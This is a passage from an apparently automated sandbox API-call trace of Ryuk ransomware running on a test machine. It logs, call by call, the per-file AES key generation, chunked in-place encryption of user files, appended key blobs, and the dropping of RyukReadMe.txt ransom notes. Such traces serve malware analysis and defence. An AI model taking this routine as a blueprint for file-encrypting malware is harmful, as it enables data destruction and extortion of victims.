(in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=25340970) returned 1 [0147.898] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x182ab08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.898] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.899] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.899] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.899] SetFilePointer (in: hFile=0x198, lDistanceToMove=5000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4c4b40 [0147.899] ReadFile (in: hFile=0x198, lpBuffer=0x29ab178, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab178*, lpNumberOfBytesRead=0x29ab148*=0x10, lpOverlapped=0x0) returned 1 [0147.901] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.901] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.901] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.901] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0147.919] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240) returned 1 [0147.919] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240) returned 1 [0147.925] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.925] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0147.927] SetFilePointer (in: hFile=0x198, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0147.927] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0147.942] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240) returned 1 [0147.942] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240) returned 1 [0147.947] SetFilePointer (in: hFile=0x198, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0147.947] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0147.951] SetFilePointer (in: hFile=0x198, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0147.951] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0147.973] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240) returned 1 [0147.973] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240) returned 1 [0147.978] SetFilePointer (in: hFile=0x198, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0147.978] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0147.982] SetFilePointer (in: hFile=0x198, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0147.982] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0147.998] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240) returned 1 [0147.998] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240) returned 1 [0148.003] SetFilePointer (in: hFile=0x198, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0148.004] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0148.007] SetFilePointer (in: hFile=0x198, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0148.007] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0148.028] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240) returned 1 [0148.028] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4240) returned 1 [0148.034] SetFilePointer (in: hFile=0x198, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0148.034] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xf4240, lpOverlapped=0x0) returned 1 [0148.037] SetFilePointer (in: hFile=0x198, lDistanceToMove=5000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4c4b40 [0148.037] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x0, lpOverlapped=0x0) returned 1 [0148.037] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0148.037] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x10) returned 1 [0148.037] SetFilePointer (in: hFile=0x198, lDistanceToMove=5000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4c4b40 [0148.037] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x10, lpOverlapped=0x0) returned 1 [0148.037] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0148.037] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0xa, lpOverlapped=0x0) returned 1 [0148.037] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0148.038] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0148.038] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0148.038] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0148.038] WriteFile (in: hFile=0x198, lpBuffer=0x29ab178*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab178*, lpNumberOfBytesWritten=0x29ab148*=0x10, lpOverlapped=0x0) returned 1 [0148.038] CloseHandle (hObject=0x198) returned 1 [0148.283] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.287] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.287] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.287] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.288] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi", dwFileAttributes=0x80) returned 1 [0148.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.289] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=906752) returned 1 [0148.289] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=906752) returned 1 [0148.289] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xdd4de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.289] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0148.290] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.290] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0148.290] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.291] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.291] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdd600, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xdd600, lpOverlapped=0x0) returned 1 [0148.306] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0148.306] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xdd600, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xdd610) returned 1 [0148.311] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.311] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdd610, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xdd610, lpOverlapped=0x0) returned 1 [0148.313] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0148.314] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0148.314] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0148.314] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0148.314] CloseHandle (hObject=0x198) returned 1 [0148.320] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.324] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.324] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.324] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0148.324] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0148.324] SetLastError (dwErrCode=0x0) [0148.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.327] GetLastError () returned 0x0 [0148.327] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0148.328] CloseHandle (hObject=0x194) returned 1 [0148.328] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.328] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.328] SetLastError (dwErrCode=0x0) [0148.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.328] GetLastError () returned 0xb7 [0148.328] CloseHandle (hObject=0x190) returned 1 [0148.329] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0148.329] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0148.329] SetLastError (dwErrCode=0x0) [0148.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.329] GetLastError () returned 0xb7 [0148.329] CloseHandle (hObject=0x18c) returned 1 [0148.329] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0148.329] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0148.329] SetLastError (dwErrCode=0x0) [0148.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0148.329] GetLastError () returned 0xb7 [0148.329] CloseHandle (hObject=0x188) returned 1 [0148.329] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0148.329] SetLastError (dwErrCode=0x0) [0148.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0148.329] GetLastError () returned 0xb7 [0148.329] CloseHandle (hObject=0x188) returned 1 [0148.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0148.330] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.330] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.330] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0l9K1tDOh.png", dwFileAttributes=0x80) returned 1 [0148.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0l9K1tDOh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0l9k1tdoh.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.330] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=23361) returned 1 [0148.330] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=23361) returned 1 [0148.330] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x5a1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.330] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.331] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.331] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.331] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.331] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.331] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5b41, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x5b41, lpOverlapped=0x0) returned 1 [0148.332] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.332] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x5b41, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x5b50) returned 1 [0148.332] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.332] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5b50, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x5b50, lpOverlapped=0x0) returned 1 [0148.332] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.332] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.332] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.332] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.332] CloseHandle (hObject=0x18c) returned 1 [0148.349] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.352] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.353] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.353] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.353] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.353] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1z27F3.docx", dwFileAttributes=0x80) returned 1 [0148.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1z27F3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1z27f3.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.353] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=91848) returned 1 [0148.353] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=91848) returned 1 [0148.353] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x165a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.353] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.354] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.354] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.354] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, 